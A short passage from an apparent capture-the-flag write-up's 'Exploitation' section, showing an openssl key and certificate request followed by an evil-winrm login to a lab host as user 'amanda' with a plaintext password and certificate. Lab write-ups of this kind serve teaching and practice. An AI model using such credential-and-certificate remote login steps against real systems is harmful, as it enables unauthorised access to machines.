Exploitation

Downloading the certificate and creating our own private key allowed us to log in via SSL on evil-winrm.

openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
evil-winrm -i 10.10.10.103  -u 'amanda' -p 'Ashare1972'  -k amanda.key -c certnew.cer -S

Last updated